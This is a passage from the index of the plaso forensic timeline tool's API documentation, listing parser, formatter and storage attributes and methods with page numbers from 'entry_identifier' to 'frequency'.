
entry_identifier (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventDataattribute), 227

entry_index (plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheEventDataattribute), 296

entry_index (plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryEventDataattribute), 323

entry_index (plaso.storage.identifiers.SerializedStreamIdentifierattribute), 479

entry_name (plaso.parsers.mac_keychain.KeychainApplicationRecordEventDataattribute), 359

entry_name (plaso.parsers.mac_keychain.KeychainInternetRecordEventDataattribute), 360

entry_number (plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsDestListEntryEventDataattribute), 234

entry_selection (plaso.parsers.opera.OperaTypedHistoryEventDataattribute), 381

entry_type (plaso.parsers.amcache.AMCacheProgramEventDataattribute), 328

entry_type (plaso.parsers.opera.OperaTypedHistoryEventDataattribute), 381

entry_type (plaso.parsers.setupapi.SetupapiLogEventDataattribute), 398

EnumerationEventFormatterHelper (class inplaso.formatters.interface), 171

env_var_location (plaso.parsers.winlnk.WinLnkLinkEventDataattribute), 429

EnvironmentVariableArtifact (class inplaso.containers.artifacts), 98

EPILOG (plaso.cli.image_export_tool.ImageExportToolattribute), 85

EPILOG (plaso.cli.log2timeline_tool.Log2TimelineToolattribute), 86

EPILOG (plaso.cli.psteal_tool.PstealTool attribute), 90EqualsOperator (class in plaso.filters.filters), 159err_code (plaso.parsers.symantec.SymantecEventData

attribute), 408Error, 184error (plaso.parsers.apt_history.APTHistoryLogEventData

attribute), 331error_control (plaso.parsers.winreg_plugins.services.WindowsRegistryServiceEventData

attribute), 316error_path_specs (plaso.engine.processing_status.ProcessingStatus

attribute), 139ESCAPE_CHARACTER (plaso.parsers.dsv_parser.DSVParser

attribute), 345ESCAPE_CHARACTER (plaso.parsers.mactime.MactimeParser

attribute), 365ESEDBCache (class in plaso.parsers.esedb), 347ESEDBParser (class in plaso.parsers.esedb), 347ESEDBPlugin (class in

plaso.parsers.esedb_plugins.interface), 226EstimateTimeRemaining()

(plaso.analysis.hash_tagging.HashTaggingAnalysisPluginmethod), 43

event (plaso.parsers.symantec.SymantecEventData at-tribute), 408

event_category (plaso.parsers.winevt.WinEvtRecordEventDataattribute), 423

event_data (plaso.parsers.symantec.SymantecEventDataattribute), 408

event_extraction (plaso.engine.configurations.ProcessingConfigurationattribute), 122

event_identifier (plaso.parsers.fseventsd.FseventsdEventDataattribute), 350

event_identifier (plaso.parsers.winevt.WinEvtRecordEventDataattribute), 423

event_identifier (plaso.parsers.winevtx.WinEvtxRecordEventDataattribute), 425

event_labels_counter(plaso.containers.sessions.Session attribute),110

event_labels_counter(plaso.containers.sessions.SessionCompletionattribute), 112

event_level (plaso.parsers.winevtx.WinEvtxRecordEventDataattribute), 425

event_timestamp (plaso.cli.time_slices.TimeSliceattribute), 92

event_type (plaso.parsers.bsm.BSMEventDataattribute), 335

event_type (plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCacheEventDataattribute), 277

Index 527


event_type (plaso.parsers.winevt.WinEvtRecordEventDataattribute), 423

EventData (class in plaso.containers.events), 102EventDataStream (class in plaso.containers.events),

103EventExpression (class in plaso.filters.expressions),

155EventExtractionConfiguration (class in

plaso.engine.configurations), 121EventExtractionWorker (class in

plaso.engine.worker), 145EventExtractor (class in plaso.engine.extractors),

126EventFilterExpressionParser (class in

plaso.filters.expression_parser), 153EventFiltersArgumentsHelper (class in

plaso.cli.helpers.event_filters), 67EventFormatter (class in

plaso.formatters.interface), 172EventFormatterHelper (class in

plaso.formatters.interface), 172EventFormattingHelper (class in

plaso.output.formatting_helper), 200EventHeap (class in plaso.storage.event_heaps), 466EventObject (class in plaso.containers.events), 104EventObjectFilter (class in

plaso.filters.event_filter), 152events_status (plaso.engine.processing_status.ProcessingStatus

attribute), 139EventSource (class in

plaso.containers.event_sources), 102EventsStatus (class in

plaso.engine.processing_status), 135EventTag (class in plaso.containers.events), 105EventTagIndex (class in

plaso.storage.event_tag_index), 467ExamineEvent() (plaso.analysis.browser_search.BrowserSearchPlugin

method), 39ExamineEvent() (plaso.analysis.chrome_extension.ChromeExtensionPlugin

method), 40ExamineEvent() (plaso.analysis.file_hashes.FileHashesPlugin

method), 41ExamineEvent() (plaso.analysis.hash_tagging.HashTaggingAnalysisPlugin

method), 43ExamineEvent() (plaso.analysis.interface.AnalysisPlugin

method), 44ExamineEvent() (plaso.analysis.sessionize.SessionizeAnalysisPlugin

method), 49ExamineEvent() (plaso.analysis.tagging.TaggingAnalysisPlugin

method), 50ExamineEvent() (plaso.analysis.unique_domains_visited.UniqueDomainsVisitedPlugin

method), 50ExamineEvent() (plaso.analysis.windows_services.WindowsServicesAnalysisPlugin

method), 54

excluded_file_system_find_specs(plaso.engine.filters_helper.CollectionFiltersHelperattribute), 128

executable (plaso.parsers.winprefetch.WinPrefetchExecutionEventDataattribute), 431

exit_status (plaso.parsers.setupapi.SetupapiLogEventDataattribute), 398

exit_status (plaso.parsers.utmp.UtmpEventData at-tribute), 420

ExpandGlobStars()(plaso.engine.path_helper.PathHelper classmethod), 133

ExpandPresets() (plaso.filters.parser_filter.ParserFilterExpressionHelpermethod), 163

ExpandUsersVariablePath()(plaso.engine.path_helper.PathHelper classmethod), 133

ExpandWindowsPath()(plaso.engine.path_helper.PathHelper classmethod), 133

ExpandWindowsPathSegments()(plaso.engine.path_helper.PathHelper classmethod), 133

ExplorerProgramsCacheEventData (class inplaso.parsers.winreg_plugins.programscache),313

ExplorerProgramsCacheWindowsRegistryPlugin(class in plaso.parsers.winreg_plugins.programscache),313

ExportEvents() (plaso.multi_processing.psort.PsortMultiProcessEnginemethod), 194

Expression (class in plaso.filters.expressions), 155extension_id (plaso.parsers.chrome_preferences.ChromeExtensionInstallationEventData

attribute), 339extension_id (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventData

attribute), 257extension_name (plaso.parsers.chrome_preferences.ChromeExtensionInstallationEventData

attribute), 339ExtensionsFileEntryFilter (class in

plaso.filters.file_entry), 157extra (plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesPageVisitedEventData

attribute), 265extra (plaso.parsers.symantec.SymantecEventData at-

tribute), 408extra_information

(plaso.parsers.asl.ASLEventData attribute),332

extra_tokens (plaso.parsers.bsm.BSMEventData at-tribute), 335

ExtractEvents() (plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheWindowsRegistryPluginmethod), 297

ExtractEvents() (plaso.parsers.winreg_plugins.bagmru.BagMRUWindowsRegistryPluginmethod), 297

ExtractEvents() (plaso.parsers.winreg_plugins.bam.BackgroundActivityModeratorWindowsRegistryPlugin

528 Index


method), 298ExtractEvents() (plaso.parsers.winreg_plugins.ccleaner.CCleanerPlugin

method), 299ExtractEvents() (plaso.parsers.winreg_plugins.default.DefaultPlugin

method), 300ExtractEvents() (plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin

method), 301ExtractEvents() (plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

method), 302ExtractEvents() (plaso.parsers.winreg_plugins.lfu.BootExecutePlugin

method), 303ExtractEvents() (plaso.parsers.winreg_plugins.lfu.BootVerificationPlugin

method), 304ExtractEvents() (plaso.parsers.winreg_plugins.mountpoints.MountPoints2Plugin

method), 305ExtractEvents() (plaso.parsers.winreg_plugins.mrulist.MRUListShellItemListWindowsRegistryPlugin

method), 306ExtractEvents() (plaso.parsers.winreg_plugins.mrulist.MRUListStringWindowsRegistryPlugin

method), 306ExtractEvents() (plaso.parsers.winreg_plugins.mrulistex.MRUListExShellItemListWindowsRegistryPlugin

method), 307ExtractEvents() (plaso.parsers.winreg_plugins.mrulistex.MRUListExStringAndShellItemListWindowsRegistryPlugin

method), 307ExtractEvents() (plaso.parsers.winreg_plugins.mrulistex.MRUListExStringAndShellItemWindowsRegistryPlugin

method), 308ExtractEvents() (plaso.parsers.winreg_plugins.mrulistex.MRUListExStringWindowsRegistryPlugin

method), 308ExtractEvents() (plaso.parsers.winreg_plugins.msie_zones.MSIEZoneSettingsPlugin

method), 309ExtractEvents() (plaso.parsers.winreg_plugins.network_drives.NetworkDrivesPlugin

method), 310ExtractEvents() (plaso.parsers.winreg_plugins.networks.NetworksWindowsRegistryPlugin

method), 310ExtractEvents() (plaso.parsers.winreg_plugins.officemru.OfficeMRUPlugin

method), 311ExtractEvents() (plaso.parsers.winreg_plugins.outlook.OutlookSearchMRUPlugin

method), 312ExtractEvents() (plaso.parsers.winreg_plugins.programscache.ExplorerProgramsCacheWindowsRegistryPlugin

method), 313ExtractEvents() (plaso.parsers.winreg_plugins.run.AutoRunsPlugin

method), 314ExtractEvents() (plaso.parsers.winreg_plugins.sam_users.SAMUsersWindowsRegistryPlugin

method), 315ExtractEvents() (plaso.parsers.winreg_plugins.services.ServicesPlugin

method), 315ExtractEvents() (plaso.parsers.winreg_plugins.shutdown.ShutdownWindowsRegistryPlugin

method), 317ExtractEvents() (plaso.parsers.winreg_plugins.task_scheduler.TaskCacheWindowsRegistryPlugin

method), 317ExtractEvents() (plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientMRUPlugin

method), 318ExtractEvents() (plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientPlugin

method), 319ExtractEvents() (plaso.parsers.winreg_plugins.timezone.WinRegTimezonePlugin

method), 319ExtractEvents() (plaso.parsers.winreg_plugins.typedurls.TypedURLsPlugin

method), 320ExtractEvents() (plaso.parsers.winreg_plugins.usb.USBPlugin

method), 320ExtractEvents() (plaso.parsers.winreg_plugins.usbstor.USBStorPlugin

method), 322ExtractEvents() (plaso.parsers.winreg_plugins.userassist.UserAssistPlugin

method), 323ExtractEvents() (plaso.parsers.winreg_plugins.windows_version.WindowsVersionPlugin

method), 324ExtractEvents() (plaso.parsers.winreg_plugins.winlogon.WinlogonPlugin

method), 325ExtractEvents() (plaso.parsers.winreg_plugins.winrar.WinRARHistoryPlugin

method), 326ExtractEventsFromSources()

(plaso.cli.log2timeline_tool.Log2TimelineToolmethod), 86

ExtractEventsFromSources()(plaso.cli.psteal_tool.PstealTool method),90

extraction (plaso.engine.configurations.ProcessingConfigurationattribute), 122

ExtractionArgumentsHelper (class inplaso.cli.helpers.extraction), 67

ExtractionConfiguration (class inplaso.engine.configurations), 121

ExtractionError (class inplaso.containers.warnings), 118

ExtractionTool (class in plaso.cli.extraction_tool),84

ExtractionWarning (class inplaso.containers.warnings), 118

ExtractPathSpecs()(plaso.engine.extractors.PathSpecExtractormethod), 127

Fface_time (plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventData

attribute), 230facility (plaso.parsers.asl.ASLEventData attribute),

332facility (plaso.parsers.mac_securityd.MacOSSecuritydLogEventData

attribute), 362facility (plaso.parsers.winevt.WinEvtRecordEventData

attribute), 423FakeIdentifier (class in plaso.storage.identifiers),

478FakeStorageWriter (class in

plaso.storage.fake.writer), 446family (plaso.containers.artifacts.OperatingSystemArtifact

attribute), 99favorite_count (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSStatusEventData

attribute), 290

Index 529


favorited (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidStatusEventDataattribute), 288

favorited (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSStatusEventDataattribute), 290

fetch_count (plaso.parsers.firefox_cache.FirefoxCacheEventDataattribute), 349

field_name (plaso.parsers.sqlite_plugins.chrome_autofill.ChromeAutofillEventDataattribute), 255

FIELD_SIZE_LIMIT (plaso.parsers.dsv_parser.DSVParserattribute), 345

FieldFormattingHelper (class inplaso.output.formatting_helper), 200

fields() (plaso.filters.interface.FilterObject prop-erty), 162

FIELDS_METADATA (plaso.parsers.iis.WinIISParserattribute), 354

file (plaso.parsers.symantec.SymantecEventData at-tribute), 408

file_attribute (plaso.parsers.esedb_plugins.file_history.FileHistoryNamespaceEventDataattribute), 225

file_attribute_flags(plaso.parsers.ntfs.NTFSFileStatEventDataattribute), 377

file_attribute_flags(plaso.parsers.ntfs.NTFSUSNChangeEventDataattribute), 379

file_attribute_flags(plaso.parsers.winlnk.WinLnkLinkEventDataattribute), 429

file_description (plaso.parsers.amcache.AMCacheFileEventDataattribute), 326

file_details (plaso.parsers.networkminer.NetworkMinerEventDataattribute), 376

file_entropy (plaso.containers.events.EventDataStreamattribute), 103

file_entry_type (plaso.containers.event_sources.EventSourceattribute), 102

file_entry_type (plaso.containers.tasks.Task at-tribute), 115

file_entry_type (plaso.parsers.filestat.FileStatEventDataattribute), 348

file_extension (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventDataattribute), 227

file_md5 (plaso.parsers.networkminer.NetworkMinerEventDataattribute), 376

file_name (plaso.parsers.google_logging.GoogleLogEventDataattribute), 352

file_name (plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItemEventDataattribute), 403

file_new_path (plaso.parsers.santa.SantaFileSystemEventDataattribute), 393

file_path (plaso.parsers.networkminer.NetworkMinerEventDataattribute), 376

file_path (plaso.parsers.santa.SantaFileSystemEventData

attribute), 393file_paths (plaso.parsers.amcache.AMCacheProgramEventData

attribute), 328file_reference (plaso.containers.shell_item_events.ShellItemFileEntryEventData

attribute), 114file_reference (plaso.parsers.amcache.AMCacheFileEventData

attribute), 327file_reference (plaso.parsers.ntfs.NTFSFileStatEventData

attribute), 378file_reference (plaso.parsers.ntfs.NTFSUSNChangeEventData

attribute), 379file_size (plaso.parsers.amcache.AMCacheFileEventData

attribute), 327file_size (plaso.parsers.filestat.FileStatEventData

attribute), 348file_size (plaso.parsers.networkminer.NetworkMinerEventData

attribute), 376file_size (plaso.parsers.recycler.WinRecycleBinEventData

attribute), 390file_size (plaso.parsers.winlnk.WinLnkLinkEventData

attribute), 429file_system_artifact_names

(plaso.engine.artifact_filters.ArtifactDefinitionsFiltersHelperattribute), 120

file_system_identifier(plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItemEventDataattribute), 403

file_system_type (plaso.parsers.filestat.FileStatEventDataattribute), 348

file_system_type (plaso.parsers.ntfs.NTFSFileStatEventDataattribute), 378

file_system_type (plaso.parsers.ntfs.NTFSUSNChangeEventDataattribute), 379

FILE_TYPE_BLOCK_1024(plaso.parsers.chrome_cache.CacheAddressattribute), 336



FILE_TYPE_BLOCK_RANKINGS(plaso.parsers.chrome_cache.CacheAddressattribute), 336

FILE_TYPE_SEPARATE(plaso.parsers.chrome_cache.CacheAddressattribute), 336

file_version (plaso.parsers.amcache.AMCacheFileEventDataattribute), 327

FileArtifactPreprocessorPlugin (class inplaso.preprocessors.interface), 437

FileEntryArtifactPreprocessorPlugin(class in plaso.preprocessors.interface), 437

530 Index


FileEntryEventSource (class inplaso.containers.event_sources), 102

FileEntryFilter (class in plaso.filters.file_entry),157

FileEntryFilterCollection (class inplaso.filters.file_entry), 157

FileEntryParser (class in plaso.parsers.interface),356

FileHashesPlugin (class inplaso.analysis.file_hashes), 41

FileHistoryESEDBPlugin (class inplaso.parsers.esedb_plugins.file_history),225

FileHistoryNamespaceEventData (class inplaso.parsers.esedb_plugins.file_history), 225

filename (plaso.parsers.chrome_cache.CacheAddressattribute), 336

filename (plaso.parsers.filestat.FileStatEventData at-tribute), 348

filename (plaso.parsers.mactime.MactimeEventDataattribute), 364

filename (plaso.parsers.mcafeeav.McafeeAVEventDataattribute), 368

filename (plaso.parsers.networkminer.NetworkMinerEventDataattribute), 376

filename (plaso.parsers.ntfs.NTFSFileStatEventDataattribute), 378

filename (plaso.parsers.ntfs.NTFSUSNChangeEventDataattribute), 379

filename (plaso.parsers.sqlite_plugins.kodi.KodiVideoEventDataattribute), 272

filename (plaso.parsers.trendmicroav.TrendMicroAVEventDataattribute), 418

FileNameFileEntryFilter (class inplaso.parsers.interface), 356

FileObjectInputReader (class in plaso.cli.tools),95

FileObjectOutputWriter (class inplaso.cli.tools), 95

FileObjectParser (class inplaso.parsers.interface), 356

files (plaso.parsers.amcache.AMCacheProgramEventDataattribute), 328

FileStatEventData (class in plaso.parsers.filestat),348

FileStatEventFormatter (class inplaso.formatters.file_system), 168

FileStatParser (class in plaso.parsers.filestat), 348FileSystemArtifactPreprocessorPlugin

(class in plaso.preprocessors.interface), 438Filter (class in plaso.filters.filters), 160filter_expression()

(plaso.filters.interface.FilterObject property),163

filter_file (plaso.containers.sessions.Session at-tribute), 110

filter_file (plaso.containers.sessions.SessionConfigurationattribute), 113

filter_file (plaso.engine.configurations.ProcessingConfigurationattribute), 122

filter_name() (plaso.filters.interface.FilterObjectproperty), 163

filter_object (plaso.engine.configurations.EventExtractionConfigurationattribute), 121

filter_string (plaso.containers.reports.AnalysisReportattribute), 109

filter_type (plaso.engine.path_filters.PathFilter at-tribute), 132

FILTER_TYPE_EXCLUDE(plaso.engine.path_filters.PathFilter attribute),133

FILTER_TYPE_INCLUDE(plaso.engine.path_filters.PathFilter attribute),133

FilterFile (class in plaso.engine.filter_file), 127FilterFileArgumentsHelper (class in

plaso.cli.helpers.filter_file), 68FilterObject (class in plaso.filters.interface), 162FILTERS (plaso.parsers.interface.BaseParser attribute),

355FILTERS (plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheWindowsRegistryPlugin

attribute), 297FILTERS (plaso.parsers.winreg_plugins.bagmru.BagMRUWindowsRegistryPlugin

attribute), 298FILTERS (plaso.parsers.winreg_plugins.bam.BackgroundActivityModeratorWindowsRegistryPlugin

attribute), 298FILTERS (plaso.parsers.winreg_plugins.ccleaner.CCleanerPlugin

attribute), 299FILTERS (plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

attribute), 303FILTERS (plaso.parsers.winreg_plugins.lfu.BootExecutePlugin

attribute), 303FILTERS (plaso.parsers.winreg_plugins.lfu.BootVerificationPlugin

attribute), 304FILTERS (plaso.parsers.winreg_plugins.mountpoints.MountPoints2Plugin

attribute), 305FILTERS (plaso.parsers.winreg_plugins.mrulist.MRUListShellItemListWindowsRegistryPlugin

attribute), 306FILTERS (plaso.parsers.winreg_plugins.mrulist.MRUListStringWindowsRegistryPlugin

attribute), 306FILTERS (plaso.parsers.winreg_plugins.mrulistex.MRUListExShellItemListWindowsRegistryPlugin

attribute), 307FILTERS (plaso.parsers.winreg_plugins.mrulistex.MRUListExStringAndShellItemListWindowsRegistryPlugin

attribute), 308FILTERS (plaso.parsers.winreg_plugins.mrulistex.MRUListExStringAndShellItemWindowsRegistryPlugin

attribute), 308FILTERS (plaso.parsers.winreg_plugins.mrulistex.MRUListExStringWindowsRegistryPlugin

attribute), 308

Index 531


FILTERS (plaso.parsers.winreg_plugins.msie_zones.MSIEZoneSettingsPluginattribute), 309

FILTERS (plaso.parsers.winreg_plugins.network_drives.NetworkDrivesPluginattribute), 310

FILTERS (plaso.parsers.winreg_plugins.networks.NetworksWindowsRegistryPluginattribute), 310

FILTERS (plaso.parsers.winreg_plugins.officemru.OfficeMRUPluginattribute), 312

FILTERS (plaso.parsers.winreg_plugins.outlook.OutlookSearchMRUPluginattribute), 312

FILTERS (plaso.parsers.winreg_plugins.programscache.ExplorerProgramsCacheWindowsRegistryPluginattribute), 313

FILTERS (plaso.parsers.winreg_plugins.run.AutoRunsPluginattribute), 314

FILTERS (plaso.parsers.winreg_plugins.sam_users.SAMUsersWindowsRegistryPluginattribute), 315

FILTERS (plaso.parsers.winreg_plugins.services.ServicesPluginattribute), 315

FILTERS (plaso.parsers.winreg_plugins.shutdown.ShutdownWindowsRegistryPluginattribute), 317

FILTERS (plaso.parsers.winreg_plugins.task_scheduler.TaskCacheWindowsRegistryPluginattribute), 318

FILTERS (plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientMRUPluginattribute), 319

FILTERS (plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientPluginattribute), 319

FILTERS (plaso.parsers.winreg_plugins.timezone.WinRegTimezonePluginattribute), 319

FILTERS (plaso.parsers.winreg_plugins.typedurls.TypedURLsPluginattribute), 320

FILTERS (plaso.parsers.winreg_plugins.usb.USBPluginattribute), 321

FILTERS (plaso.parsers.winreg_plugins.usbstor.USBStorPluginattribute), 322

FILTERS (plaso.parsers.winreg_plugins.userassist.UserAssistPluginattribute), 323

FILTERS (plaso.parsers.winreg_plugins.windows_version.WindowsVersionPluginattribute), 324

FILTERS (plaso.parsers.winreg_plugins.winlogon.WinlogonPluginattribute), 325

FILTERS (plaso.parsers.winreg_plugins.winrar.WinRARHistoryPluginattribute), 326

FILTERS (plaso.parsers.winrestore.RestorePointLogParserattribute), 433

Finalize() (plaso.storage.redis.redis_store.RedisStoremethod), 455

FinalizeTaskStorage()(plaso.storage.fake.writer.FakeStorageWritermethod), 448

FinalizeTaskStorage()(plaso.storage.file_interface.StorageFileWritermethod), 474

FinalizeTaskStorage()(plaso.storage.interface.StorageWriter

method), 488FinalizeTaskStorage()

(plaso.storage.redis.writer.RedisStorageWritermethod), 458

fingerprint (plaso.parsers.syslog_plugins.ssh.SSHEventDataattribute), 295

FIREFOX_CACHE_CONFIG(plaso.parsers.firefox_cache.FirefoxCacheParserattribute), 350

FirefoxCache2Parser (class inplaso.parsers.firefox_cache), 349

FirefoxCacheEventData (class inplaso.parsers.firefox_cache), 349

FirefoxCacheParser (class inplaso.parsers.firefox_cache), 350

FirefoxCookieEventData (class inplaso.parsers.sqlite_plugins.firefox_cookies),261

FirefoxCookiePlugin (class inplaso.parsers.sqlite_plugins.firefox_cookies),261

FirefoxDownloadEventData (class inplaso.parsers.sqlite_plugins.firefox_downloads),262

FirefoxDownloadsPlugin (class inplaso.parsers.sqlite_plugins.firefox_downloads),262

FirefoxHistoryPlugin (class inplaso.parsers.sqlite_plugins.firefox_history),263

FirefoxPageVisitFormatter (class inplaso.formatters.firefox), 169

FirefoxPlacesBookmarkAnnotationEventData(class in plaso.parsers.sqlite_plugins.firefox_history),264

FirefoxPlacesBookmarkEventData (class inplaso.parsers.sqlite_plugins.firefox_history),264

FirefoxPlacesBookmarkFolderEventData(class in plaso.parsers.sqlite_plugins.firefox_history),265

FirefoxPlacesPageVisitedEventData (classin plaso.parsers.sqlite_plugins.firefox_history),265

FIREWALL_LINE (plaso.parsers.mac_appfirewall.MacAppFirewallParserattribute), 358

first_name (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidContactEventDataattribute), 284

flags (plaso.parsers.fseventsd.FseventsdEventData at-tribute), 350

flags (plaso.parsers.safari_cookies.SafariBinaryCookieEventDataattribute), 391

flags (plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItemattribute), 403

532 Index


flags (plaso.parsers.symantec.SymantecEventData at-tribute), 408

flags (plaso.parsers.winfirewall.WinFirewallEventDataattribute), 426

FlagsEventFormatterHelper (class inplaso.formatters.interface), 173

FlipBool() (plaso.filters.filters.GenericBinaryOperatormethod), 160

FLOATING_POINT_COLUMN_TYPES(plaso.parsers.esedb_plugins.interface.ESEDBPluginattribute), 226

Flush() (plaso.lib.bufferlib.CircularBuffer method),183

followers (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidContactEventDataattribute), 287

followers_count (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSContactEventDataattribute), 289

following (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSContactEventDataattribute), 289

following_count (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSContactEventDataattribute), 289

FOOTER (plaso.parsers.popcontest.PopularityContestParserattribute), 387

foreground_bytes_read(plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataattribute), 231

foreground_bytes_written(plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataattribute), 231

foreground_context_switches(plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataattribute), 231

foreground_cycle_time(plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataattribute), 231

foreground_number_for_flushes(plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataattribute), 231

foreground_number_for_read_operations(plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataattribute), 231

foreground_number_for_write_operations(plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataattribute), 231

foreman_status (plaso.engine.processing_status.ProcessingStatusattribute), 139

FORMAT_STRING (plaso.formatters.default.DefaultFormatterattribute), 168

FORMAT_STRING (plaso.formatters.interface.EventFormatterattribute), 172

FORMAT_STRING (plaso.formatters.winreg.WinRegistryGenericFormatterattribute), 182

FORMAT_STRING_ALTERNATIVE(plaso.formatters.winreg.WinRegistryGenericFormatter

attribute), 182FORMAT_STRING_PIECES

(plaso.formatters.asl.ASLFormatter attribute),166

FORMAT_STRING_PIECES(plaso.formatters.chrome.ChromePageVisitedFormatterattribute), 167

FORMAT_STRING_PIECES(plaso.formatters.chrome_preferences.ChromeContentSettingsExceptionsFormatterattribute), 167

FORMAT_STRING_PIECES(plaso.formatters.file_system.FileStatEventFormatterattribute), 168

FORMAT_STRING_PIECES(plaso.formatters.file_system.NTFSFileStatEventFormatterattribute), 169

FORMAT_STRING_PIECES(plaso.formatters.file_system.NTFSUSNChangeEventFormatterattribute), 169

FORMAT_STRING_PIECES(plaso.formatters.firefox.FirefoxPageVisitFormatterattribute), 169

FORMAT_STRING_PIECES(plaso.formatters.gdrive.GDriveCloudEntryFormatterattribute), 170

FORMAT_STRING_PIECES(plaso.formatters.interface.ConditionalEventFormatterattribute), 171

FORMAT_STRING_PIECES(plaso.formatters.msiecf.MsiecfLeakFormatterattribute), 176

FORMAT_STRING_PIECES(plaso.formatters.msiecf.MsiecfRedirectedFormatterattribute), 176

FORMAT_STRING_PIECES(plaso.formatters.msiecf.MsiecfUrlFormatterattribute), 176

FORMAT_STRING_PIECES(plaso.formatters.olecf.OLECFSummaryInfoFormatterattribute), 176

FORMAT_STRING_PIECES(plaso.formatters.safari_cookies.SafariCookieFormatterattribute), 177

FORMAT_STRING_PIECES(plaso.formatters.shell_items.ShellItemFileEntryEventFormatterattribute), 177

FORMAT_STRING_PIECES(plaso.formatters.tango_android.TangoAndroidContactFormatterattribute), 178

FORMAT_STRING_PIECES(plaso.formatters.winevt.WinEVTFormatterattribute), 178

FORMAT_STRING_PIECES(plaso.formatters.winevtx.WinEVTXFormatter

Index 533


attribute), 181FORMAT_STRING_PIECES

(plaso.formatters.winlnk.WinLnkLinkFormatterattribute), 181

FORMAT_STRING_PIECES(plaso.formatters.winprefetch.WinPrefetchExecutionFormatterattribute), 182

FORMAT_STRING_SEPARATOR(plaso.formatters.interface.ConditionalEventFormatterattribute), 171

FORMAT_STRING_SHORT(plaso.formatters.default.DefaultFormatterattribute), 168

FORMAT_STRING_SHORT(plaso.formatters.interface.EventFormatterattribute), 172

FORMAT_STRING_SHORT_PIECES(plaso.formatters.asl.ASLFormatter attribute),166

FORMAT_STRING_SHORT_PIECES(plaso.formatters.chrome.ChromePageVisitedFormatterattribute), 167

FORMAT_STRING_SHORT_PIECES(plaso.formatters.chrome_preferences.ChromeContentSettingsExceptionsFormatterattribute), 167

FORMAT_STRING_SHORT_PIECES(plaso.formatters.file_system.FileStatEventFormatterattribute), 168

FORMAT_STRING_SHORT_PIECES(plaso.formatters.file_system.NTFSFileStatEventFormatterattribute), 169

FORMAT_STRING_SHORT_PIECES(plaso.formatters.file_system.NTFSUSNChangeEventFormatterattribute), 169

FORMAT_STRING_SHORT_PIECES(plaso.formatters.firefox.FirefoxPageVisitFormatterattribute), 169

FORMAT_STRING_SHORT_PIECES(plaso.formatters.gdrive.GDriveCloudEntryFormatterattribute), 170

FORMAT_STRING_SHORT_PIECES(plaso.formatters.interface.ConditionalEventFormatterattribute), 171

FORMAT_STRING_SHORT_PIECES(plaso.formatters.msiecf.MsiecfLeakFormatterattribute), 176

FORMAT_STRING_SHORT_PIECES(plaso.formatters.msiecf.MsiecfRedirectedFormatterattribute), 176

FORMAT_STRING_SHORT_PIECES(plaso.formatters.msiecf.MsiecfUrlFormatterattribute), 176

FORMAT_STRING_SHORT_PIECES(plaso.formatters.olecf.OLECFSummaryInfoFormatter

attribute), 176FORMAT_STRING_SHORT_PIECES

(plaso.formatters.safari_cookies.SafariCookieFormatterattribute), 177

FORMAT_STRING_SHORT_PIECES(plaso.formatters.shell_items.ShellItemFileEntryEventFormatterattribute), 177

FORMAT_STRING_SHORT_PIECES(plaso.formatters.tango_android.TangoAndroidContactFormatterattribute), 178

FORMAT_STRING_SHORT_PIECES(plaso.formatters.winevt.WinEVTFormatterattribute), 178

FORMAT_STRING_SHORT_PIECES(plaso.formatters.winevtx.WinEVTXFormatterattribute), 181

FORMAT_STRING_SHORT_PIECES(plaso.formatters.winlnk.WinLnkLinkFormatterattribute), 181

FORMAT_STRING_SHORT_PIECES(plaso.formatters.winprefetch.WinPrefetchExecutionFormatterattribute), 182

FORMAT_TYPE_CLI (plaso.cli.views.ViewsFactory at-tribute), 97

FORMAT_TYPE_MARKDOWN(plaso.cli.views.ViewsFactory attribute),97

format_version (plaso.parsers.winprefetch.WinPrefetchExecutionEventDataattribute), 431

format_version (plaso.storage.interface.BaseStoreattribute), 479

format_version (plaso.storage.sqlite.sqlite_file.SQLiteStorageFileattribute), 462

FormatEventValues()(plaso.formatters.interface.EnumerationEventFormatterHelpermethod), 172

FormatEventValues()(plaso.formatters.interface.EventFormatterHelpermethod), 173

FormatEventValues()(plaso.formatters.interface.FlagsEventFormatterHelpermethod), 173

FormatSpecification (class inplaso.lib.specification), 189

FormatSpecificationStore (class inplaso.lib.specification), 189

FormatterMediator (class inplaso.formatters.mediator), 175

FormattersManager (class inplaso.formatters.manager), 173

FormattersOptions (class inplaso.cli.tool_options), 92

FOUR_DIGITS (plaso.parsers.text_parser.PyparsingConstantsattribute), 415

534 Index


frequency (plaso.parsers.firefox_cache.FirefoxCacheEventDataattribute), 349

